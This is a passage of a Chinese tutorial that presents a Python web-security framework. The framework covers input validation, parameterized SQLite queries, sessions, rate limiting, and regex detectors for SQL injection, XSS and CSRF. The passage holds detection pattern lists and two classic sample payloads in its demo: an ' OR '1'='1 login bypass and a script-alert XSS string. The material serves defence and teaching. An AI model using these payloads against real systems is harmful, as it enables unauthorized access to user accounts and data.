        if len(value) > 1000:
            return False, "输入过长"
        
        # 检查空值
        if field_type not in ['password', 'description'] and not value.strip():
            return False, "字段不能为空"
        
        # 使用自定义模式或预定义模式
        pattern = custom_pattern or self.patterns.get(field_type)
        
        if pattern and not re.match(pattern, value):
            return False, f"无效的{field_type}格式"
        
        # 额外的安全检查
        if self._contains_malicious_content(value):
            return False, "检测到可疑内容"
        
        return True, ""
    
    def _contains_malicious_content(self, value: str) -> bool:
        """
        检查是否包含恶意内容
        
        参数:
            value: 输入值
            
        返回:
            是否包含恶意内容
        """
        malicious_patterns = [
            r'<script.*?>',  # 脚本标签
            r'javascript:',   # JavaScript协议
            r'on\w+=',        # 事件处理器
            r'&#',            # HTML实体
            r'/\*.*?\*/',     # SQL注释
            r'--\s',          # SQL注释
            r';.*--',         # SQL注入
            r'union.*select', # SQL注入
            r'\.\./',         # 路径遍历
            r'\.\.\\',        # 路径遍历
            r'exec\s*\(',     # 命令执行
            r'eval\s*\(',     # 命令执行
        ]
        
        for pattern in malicious_patterns:
            if re.search(pattern, value, re.IGNORECASE | re.DOTALL):
                return True
        
        return False

# ==================== 数据库安全类 ====================

class SecureDatabase:
    """安全的数据库操作类"""
    
    def __init__(self, db_path: str):
        """
        初始化数据库连接
        
        参数:
            db_path: 数据库路径
        """
        self.db_path = db_path
        self.conn = None
        self.connect()
        
        # 设置连接属性
        self.conn.execute("PRAGMA foreign_keys = ON")
        self.conn.execute("PRAGMA journal_mode = WAL")
    
    def connect(self):
        """建立数据库连接"""
        try:
            self.conn = sqlite3.connect(
                self.db_path,
                timeout=10,
                check_same_thread=False
            )
            self.conn.row_factory = sqlite3.Row
        except sqlite3.Error as e:
            logging.error(f"数据库连接失败: {e}")
            raise
    
    def execute_query(self, query: str, params: Tuple = ()) -> List[Dict]:
        """
        执行查询(使用参数化查询防止SQL注入)
        
        参数:
            query: SQL查询语句
            params: 查询参数
            
        返回:
            查询结果列表
        """
        try:
            cursor = self.conn.cursor()
            cursor.execute(query, params)
            results = cursor.fetchall()
            return [dict(row) for row in results]
        except sqlite3.Error as e:
            logging.error(f"查询执行失败: {e}")
            return []
    
    def execute_update(self, query: str, params: Tuple = ()) -> bool:
        """
        执行更新操作
        
        参数:
            query: SQL语句
            params: 参数
            
        返回:
            是否成功
        """
        try:
            cursor = self.conn.cursor()
            cursor.execute(query, params)
            self.conn.commit()
            return True
        except sqlite3.Error as e:
            logging.error(f"更新执行失败: {e}")
            self.conn.rollback()
            return False
    
    def close(self):
        """关闭数据库连接"""
        if self.conn:
            self.conn.close()

# ==================== 会话管理类 ====================

class SessionManager:
    """安全的会话管理"""
    
    def __init__(self, db: SecureDatabase):
        """
        初始化会话管理器
        
        参数:
            db: 数据库实例
        """
        self.db = db
        self.sessions = {}
        self.setup_session_table()
    
    def setup_session_table(self):
        """创建会话表"""
        query = """
        CREATE TABLE IF NOT EXISTS sessions (
            session_id TEXT PRIMARY KEY,
            user_id INTEGER NOT NULL,
            created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
            expires_at TIMESTAMP NOT NULL,
            ip_address TEXT,
            user_agent TEXT,
            is_active INTEGER DEFAULT 1,
            FOREIGN KEY (user_id) REFERENCES users(id)
        )
        """
        self.db.execute_update(query)
    
    def create_session(self, user_id: int, ip_address: str, 
                      user_agent: str) -> Optional[str]:
        """
        创建新会话
        
        参数:
            user_id: 用户ID
            ip_address: 客户端IP
            user_agent: 用户代理
            
        返回:
            会话ID或None
        """
        # 生成安全的会话ID
        session_id = SecurityUtils.generate_token()
        
        # 设置过期时间(24小时)
        expires_at = datetime.now() + timedelta(hours=24)
        
        query = """
        INSERT INTO sessions 
        (session_id, user_id, expires_at, ip_address, user_agent)
        VALUES (?, ?, ?, ?, ?)
        """
        
        success = self.db.execute_update(
            query,
            (session_id, user_id, expires_at.isoformat(), 
             ip_address, user_agent[:200])
        )
        
        if success:
            return session_id
        return None
    
    def validate_session(self, session_id: str, ip_address: str) -> bool:
        """
        验证会话是否有效
        
        参数:
            session_id: 会话ID
            ip_address: 客户端IP
            
        返回:
            是否有效
        """
        query = """
        SELECT * FROM sessions 
        WHERE session_id = ? 
          AND is_active = 1 
          AND expires_at > ?
          AND ip_address = ?
        """
        
        now = datetime.now().isoformat()
        results = self.db.execute_query(query, (session_id, now, ip_address))
        
        return len(results) > 0
    
    def destroy_session(self, session_id: str):
        """销毁会话"""
        query = "UPDATE sessions SET is_active = 0 WHERE session_id = ?"
        self.db.execute_update(query, (session_id,))
    
    def cleanup_expired_sessions(self):
        """清理过期会话"""
        query = "DELETE FROM sessions WHERE expires_at <= ?"
        now = datetime.now().isoformat()
        self.db.execute_update(query, (now,))

# ==================== 主要安全防护类 ====================

class SecurityFramework:
    """
    综合安全防护框架
    集成多种安全防护功能
    """
    
    def __init__(self, config_path: str = "security_config.json"):
        """
        初始化安全框架
        
        参数:
            config_path: 配置文件路径
        """
        self.config = self._load_config(config_path)
        self.utils = SecurityUtils()
        self.validator = InputValidator()
        self.logger = self._setup_logging()
        
        # 初始化数据库
        self.db = SecureDatabase(self.config.get("database_path", ":memory:"))
        
        # 初始化会话管理
        self.session_manager = SessionManager(self.db)
        
        # 攻击计数器
        self.attack_counters = defaultdict(int)
        
        # 初始化时间窗口记录
        self.request_history = defaultdict(list)
    
    def _load_config(self, config_path: str) -> Dict[str, Any]:
        """
        加载配置文件
        
        参数:
            config_path: 配置文件路径
            
        返回:
            配置字典
        """
        default_config = {
            "security": {
                "enable_sql_protection": True,
                "enable_xss_protection": True,
                "enable_csrf_protection": True,
                "enable_rate_limiting": True,
                "max_login_attempts": 5,
                "rate_limit_window": 60,  # 秒
                "max_requests_per_window": 100
            },
            "logging": {
                "level": "INFO",
                "file": "security.log",
                "max_size_mb": 10
            },
            "database_path": "security.db"
        }
        
        try:
            with open(config_path, 'r') as f:
                user_config = json.load(f)
                # 深度合并配置
                self._deep_merge(default_config, user_config)
        except FileNotFoundError:
            self.log("warning", f"配置文件 {config_path} 未找到,使用默认配置")
        except json.JSONDecodeError as e:
            self.log("error", f"配置文件解析错误: {e}")
        
        return default_config
    
    def _deep_merge(self, base: Dict, update: Dict):
        """深度合并字典"""
        for key, value in update.items():
            if key in base and isinstance(base[key], dict) and isinstance(value, dict):
                self._deep_merge(base[key], value)
            else:
                base[key] = value
    
    def _setup_logging(self) -> logging.Logger:
        """
        设置日志系统
        
        返回:
            logger对象
        """
        logger = logging.getLogger("SecurityFramework")
        logger.setLevel(getattr(logging, self.config["logging"]["level"]))
        
        # 避免重复添加处理器
        if not logger.handlers:
            # 文件处理器
            file_handler = logging.FileHandler(
                self.config["logging"]["file"],
                encoding='utf-8'
            )
            file_handler.setLevel(logging.INFO)
            
            # 控制台处理器
            console_handler = logging.StreamHandler()
            console_handler.setLevel(logging.WARNING)
            
            # 格式器
            formatter = logging.Formatter(
                '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
            )
            file_handler.setFormatter(formatter)
            console_handler.setFormatter(formatter)
            
            logger.addHandler(file_handler)
            logger.addHandler(console_handler)
        
        return logger
    
    def log(self, level: str, message: str, extra: Dict = None):
        """
        记录日志
        
        参数:
            level: 日志级别
            message: 日志消息
            extra: 额外信息
        """
        log_method = getattr(self.logger, level.lower())
        log_method(message, extra=extra if extra else {})
    
    def sanitize_input(self, input_data: Any, field_type: str = "text") -> str:
        """
        清理输入数据
        
        参数:
            input_data: 输入数据
            field_type: 字段类型
            
        返回:
            清理后的字符串
        """
        if not isinstance(input_data, str):
            input_str = str(input_data)
        else:
            input_str = input_data
        
        # 验证输入
        is_valid, error_msg = self.validator.validate(field_type, input_str)
        
        if not is_valid:
            self.log("warning", f"输入验证失败: {error_msg}")
            # 根据配置决定是否抛出异常或返回默认值
            if self.config["security"].get("strict_validation", False):
                raise ValueError(f"输入验证失败: {error_msg}")
            return ""
        
        # HTML转义
        if self.config["security"]["enable_xss_protection"]:
            input_str = html.escape(input_str)
        
        return input_str
    
    def check_rate_limit(self, client_ip: str, endpoint: str) -> bool:
        """
        检查速率限制
        
        参数:
            client_ip: 客户端IP
            endpoint: 访问端点
            
        返回:
            是否允许访问
        """
        if not self.config["security"]["enable_rate_limiting"]:
            return True
        
        key = f"{client_ip}:{endpoint}"
        now = time.time()
        window = self.config["security"]["rate_limit_window"]
        
        # 清理过期的请求记录
        self.request_history[key] = [
            timestamp for timestamp in self.request_history[key]
            if now - timestamp < window
        ]
        
        # 检查请求次数
        max_requests = self.config["security"]["max_requests_per_window"]
        if len(self.request_history[key]) >= max_requests:
            self.log("warning", f"速率限制触发: IP={client_ip}, 端点={endpoint}")
            return False
        
        # 记录本次请求
        self.request_history[key].append(now)
        return True
    
    def detect_attack(self, request_data: Dict[str, Any]) -> Dict[str, Any]:
        """
        检测攻击
        
        参数:
            request_data: 请求数据
            
        返回:
            检测结果
        """
        result = {
            "is_attack": False,
            "attack_type": None,
            "confidence": 0.0,
            "details": {}
        }
        
        # 检查SQL注入
        sql_result = self._check_sql_injection(request_data)
        if sql_result["is_detected"]:
            result["is_attack"] = True
            result["attack_type"] = "sql_injection"
            result["confidence"] = max(result["confidence"], sql_result["confidence"])
            result["details"]["sql_injection"] = sql_result
            self.attack_counters["sql_injection"] += 1
        
        # 检查XSS
        xss_result = self._check_xss(request_data)
        if xss_result["is_detected"]:
            result["is_attack"] = True
            result["attack_type"] = "xss"
            result["confidence"] = max(result["confidence"], xss_result["confidence"])
            result["details"]["xss"] = xss_result
            self.attack_counters["xss"] += 1
        
        # 检查CSRF(简化版)
        if self.config["security"]["enable_csrf_protection"]:
            csrf_result = self._check_csrf(request_data)
            if csrf_result["is_detected"]:
                result["is_attack"] = True
                result["attack_type"] = "csrf"
                result["confidence"] = max(result["confidence"], csrf_result["confidence"])
                result["details"]["csrf"] = csrf_result
                self.attack_counters["csrf"] += 1
        
        # 记录攻击
        if result["is_attack"]:
            self._log_attack(request_data, result)
        
        return result
    
    def _check_sql_injection(self, request_data: Dict[str, Any]) -> Dict[str, Any]:
        """
        检查SQL注入
        
        参数:
            request_data: 请求数据
            
        返回:
            检测结果
        """
        if not self.config["security"]["enable_sql_protection"]:
            return {"is_detected": False, "confidence": 0.0}
        
        patterns = [
            r"'.*--",                    # 单引号注释
            r"'.*OR.*=.*",               # OR条件
            r"'.*UNION.*SELECT",         # UNION注入
            r"'.*DROP.*",                # DROP语句
            r"'.*;.*",                   # 多语句
            r"\b(SELECT|INSERT|UPDATE|DELETE|DROP|CREATE|ALTER)\b.*\b(FROM|INTO|TABLE)\b",
            r"\b(EXEC|EXECUTE|DECLARE|CAST)\b",
            r"@@\w+",                     # 系统变量
            r"LOAD_FILE\s*\(",            # 文件读取
            r"INTO\s+(OUTFILE|DUMPFILE)", # 文件写入
        ]
        
        max_confidence = 0.0
        suspicious_params = []
        
        # 检查所有参数
        params = request_data.get("params", {})
        for param_name, param_value in params.items():
            if not isinstance(param_value, str):
                continue
            
            param_confidence = 0.0
            
            for pattern in patterns:
                if re.search(pattern, param_value, re.IGNORECASE):
                    param_confidence = max(param_confidence, 0.7)
            
            # 检查特殊字符
            suspicious_chars = ["'", "\"", ";", "--", "/*", "*/", "@@"]
            char_count = sum(param_value.count(char) for char in suspicious_chars)
            if char_count > 1:
                param_confidence = max(param_confidence, min(0.3 + char_count * 0.2, 1.0))
            
            if param_confidence > 0.5:
                suspicious_params.append({
                    "name": param_name,
                    "value": param_value[:100],  # 截断防止日志过大
                    "confidence": param_confidence
                })
                max_confidence = max(max_confidence, param_confidence)
        
        return {
            "is_detected": max_confidence > 0.6,
            "confidence": max_confidence,
            "suspicious_params": suspicious_params
        }
    
    def _check_xss(self, request_data: Dict[str, Any]) -> Dict[str, Any]:
        """
        检查XSS攻击
        
        参数:
            request_data: 请求数据
            
        返回:
            检测结果
        """
        if not self.config["security"]["enable_xss_protection"]:
            return {"is_detected": False, "confidence": 0.0}
        
        patterns = [
            r"<script.*?>.*?</script>",           # 脚本标签
            r"on\w+\s*=\s*['\"][^'\"]*['\"]",     # 事件处理器
            r"javascript:\s*[^'\"]*",             # JavaScript协议
            r"data:\s*[^'\"]*",                   # 数据协议
            r"vbscript:\s*[^'\"]*",               # VBScript协议
            r"expression\s*\([^)]*\)",            # CSS表达式
            r"<iframe.*?>",                       # iframe标签
            r"<object.*?>",                       # object标签
            r"<embed.*?>",                        # embed标签
            r"<applet.*?>",                       # applet标签
            r"<meta.*?>.*?</meta>",               # meta标签
            r"<link.*?>",                         # link标签
            r"<style.*?>.*?</style>",             # style标签
            r"<form.*?>",                         # form标签
            r"<input.*?>",                        # input标签
            r"<button.*?>",                       # button标签
            r"<select.*?>",                       # select标签
            r"<textarea.*?>",                     # textarea标签
            r"<svg.*?>",                          # svg标签
            r"<math.*?>",                         # math标签
        ]
        
        max_confidence = 0.0
        suspicious_params = []
        
        params = request_data.get("params", {})
        for param_name, param_value in params.items():
            if not isinstance(param_value, str):
                continue
            
            param_confidence = 0.0
            
            for pattern in patterns:
                if re.search(pattern, param_value, re.IGNORECASE | re.DOTALL):
                    param_confidence = max(param_confidence, 0.8)
            
            # 检查HTML标签
            if re.search(r"<[^>]*>", param_value):
                param_confidence = max(param_confidence, 0.5)
            
            # 检查特殊字符
            if "&lt;" in param_value or "&gt;" in param_value or "&amp;" in param_value:
                param_confidence = max(param_confidence, 0.3)
            
            if param_confidence > 0.5:
                suspicious_params.append({
                    "name": param_name,
                    "value": param_value[:100],
                    "confidence": param_confidence
                })
                max_confidence = max(max_confidence, param_confidence)
        
        return {
            "is_detected": max_confidence > 0.6,
            "confidence": max_confidence,
            "suspicious_params": suspicious_params
        }
    
    def _check_csrf(self, request_data: Dict[str, Any]) -> Dict[str, Any]:
        """
        检查CSRF攻击
        
        参数:
            request_data: 请求数据
            
        返回:
            检测结果
        """
        # 简化版CSRF检查
        # 在实际应用中,应该验证CSRF令牌
        
        method = request_data.get("method", "").upper()
        referer = request_data.get("headers", {}).get("Referer", "")
        
        # 对于修改操作(POST、PUT、DELETE),检查Referer
        if method in ["POST", "PUT", "DELETE"]:
            if not referer:
                return {
                    "is_detected": True,
                    "confidence": 0.7,
                    "reason": "缺失Referer头部"
                }
            
            # 检查Referer是否来自同一站点
            origin = request_data.get("origin", "")
            if origin and referer and not referer.startswith(origin):
                return {
                    "is_detected": True,
                    "confidence": 0.8,
                    "reason": "Referer与源不匹配"
                }
        
        return {"is_detected": False, "confidence": 0.0}
    
    def _log_attack(self, request_data: Dict[str, Any], result: Dict[str, Any]):
        """
        记录攻击事件
        
        参数:
            request_data: 请求数据
            result: 检测结果
        """
        log_entry = {
            "timestamp": datetime.now().isoformat(),
            "client_ip": request_data.get("client_ip", "unknown"),
            "method": request_data.get("method", "unknown"),
            "path": request_data.get("path", "unknown"),
            "attack_type": result["attack_type"],
            "confidence": result["confidence"],
            "user_agent": request_data.get("headers", {}).get("User-Agent", ""),
            "details": result["details"]
        }
        
        self.log(
            "warning",
            f"检测到攻击: {result['attack_type']} - 置信度: {result['confidence']}",
            {"attack_data": log_entry}
        )
        
        # 保存到数据库
        try:
            query = """
            INSERT INTO attack_logs 
            (timestamp, client_ip, method, path, attack_type, confidence, details)
            VALUES (?, ?, ?, ?, ?, ?, ?)
            """
            
            self.db.execute_update(
                query,
                (
                    log_entry["timestamp"],
                    log_entry["client_ip"],
                    log_entry["method"],
                    log_entry["path"],
                    log_entry["attack_type"],
                    log_entry["confidence"],
                    json.dumps(log_entry["details"])
                )
            )
        except Exception as e:
            self.log("error", f"攻击日志保存失败: {e}")
    
    def generate_security_report(self) -> Dict[str, Any]:
        """
        生成安全报告
        
        返回:
            安全报告
        """
        # 获取统计数据
        query = """
        SELECT 
            attack_type,
            COUNT(*) as count,
            AVG(confidence) as avg_confidence,
            MAX(timestamp) as last_occurrence
        FROM attack_logs 
        WHERE timestamp > datetime('now', '-7 days')
        GROUP BY attack_type
        """
        
        stats = self.db.execute_query(query)
        
        # 计算总体安全评分
        total_attacks = sum(self.attack_counters.values())
        
        if total_attacks > 100:
            security_score = 0.3
        elif total_attacks > 50:
            security_score = 0.5
        elif total_attacks > 10:
            security_score = 0.7
        else:
            security_score = 0.9
        
        report = {
            "timestamp": datetime.now().isoformat(),
            "period": "7天",
            "summary": {
                "total_attacks_detected": total_attacks,
                "security_score": security_score,
                "attack_distribution": dict(self.attack_counters)
            },
            "detailed_stats": stats,
            "recommendations": self._generate_recommendations(stats)
        }
        
        return report
    
    def _generate_recommendations(self, stats: List[Dict]) -> List[str]:
        """
        生成安全建议
        
        参数:
            stats: 攻击统计
            
        返回:
            建议列表
        """
        recommendations = []
        
        for stat in stats:
            attack_type = stat["attack_type"]
            count = stat["count"]
            
            if attack_type == "sql_injection" and count > 10:
                recommendations.append(
                    "检测到大量SQL注入尝试,建议:\n"
                    "1. 实施严格的输入验证\n"
                    "2. 使用参数化查询\n"
                    "3. 部署Web应用防火墙"
                )
            
            if attack_type == "xss" and count > 10:
                recommendations.append(
                    "检测到大量XSS尝试,建议:\n"
                    "1. 对所有输出进行HTML编码\n"
                    "2. 实施内容安全策略\n"
                    "3. 使用安全的HTML清理库"
                )
        
        # 总体建议
        total_attacks = sum(stat["count"] for stat in stats)
        if total_attacks > 50:
            recommendations.append(
                "总体攻击次数较高,建议:\n"
                "1. 加强安全监控\n"
                "2. 定期进行安全审计\n"
                "3. 实施更严格的安全策略"
            )
        
        if not recommendations:
            recommendations.append("当前安全状况良好,继续保持现有安全措施。")
        
        return recommendations
    
    def cleanup(self):
        """清理资源"""
        self.log("info", "安全框架关闭")
        self.db.close()
        logging.shutdown()

# ==================== 使用示例 ====================

def demonstrate_security_framework():
    """演示安全框架功能"""
    print("=" * 60)
    print("网络安全综合防护系统演示")
    print("=" * 60)
    
    # 创建安全框架实例
    security = SecurityFramework()
    
    # 测试用例
    test_cases = [
        {
            "name": "正常请求",
            "request": {
                "client_ip": "192.168.1.100",
                "method": "GET",
                "path": "/index.html",
                "params": {"name": "test user"},
                "headers": {
                    "User-Agent": "Mozilla/5.0",
                    "Referer": "http://example.com"
                }
            }
        },
        {
            "name": "SQL注入尝试",
            "request": {
                "client_ip": "10.0.0.1",
                "method": "POST",
                "path": "/login",
                "params": {
                    "username": "admin' OR '1'='1",
                    "password": "anything"
                },
                "headers": {
                    "User-Agent": "AttackBot/1.0"
                }
            }
        },
        {
            "name": "XSS攻击尝试",
            "request": {
                "client_ip": "10.0.0.2",
                "method": "GET",
                "path": "/search",
                "params": {"q": "<script>alert('XSS')</script>"},
                "headers": {
                    "User-Agent": "Mozilla/5.0"
                }
            }
        }
    ]
    
    for test_case in test_cases:
        print(f"\n测试: {test_case['name']}")
        print("-" * 40)
        
        # 清理输入
        sanitized_params = {}
        for key, value in test_case["request"]["params"].items():
            sanitized_params[key] = security.sanitize_input(value, "text")
            print(f"参数 {key}: '{value}' -> '{sanitized_params[key]}'")
        
        # 检测攻击
        attack_result = security.detect_attack(test_case["request"])
        
        if attack_result["is_attack"]:
            print(f"⚠️  检测到攻击: {attack_result['attack_type']}")
            print(f"   置信度: {attack_result['confidence']:.2f}")
        else:
            print("✅ 未检测到攻击")
        
        # 检查速率限制
        ip = test_case["request"]["client_ip"]
        endpoint = test_case["request"]["path"]
        if security.check_rate_limit(ip, endpoint):
            print("✅ 速率限制检查通过")
        else:
            print("⚠️  速率限制触发")
    
    # 生成安全报告
    print("\n" + "=" * 60)
    print("安全报告")
    print("=" * 60)
    
    report = security.generate_security_report()
    print(f"时间段: {report['period']}")
    print(f"总攻击次数: {report['summary']['total_attacks_detected']}")
    print(f"安全评分: {report['summary']['security_score']:.2f}")
    
    print("\n攻击分布:")
    for attack_type, count in report['summary']['attack_distribution'].items():
        print(f"  {attack_type}: {count}次")
    
    print("\n安全建议:")
    for i, recommendation in enumerate(report['recommendations'], 1):
        print(f"{i}. {recommendation}")
    
    # 清理资源
    security.cleanup()

if __name__ == "__main__":
    demonstrate_security_framework()

5.2 代码自查与优化

在部署前,我们对代码进行了全面的自查,确保其符合以下标准:

5.2.1 安全性检查
  1. SQL注入防护:所有数据库操作均使用参数化查询
  2. XSS防护:输出时进行HTML编码,输入时进行验证
  3. CSRF防护:实现了基本的CSRF检测机制
  4. 会话安全:使用安全的会话管理和令牌生成
  5. 密码安全:使用PBKDF2进行密码哈希,添加盐值
  6. 输入验证:对
Logo

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐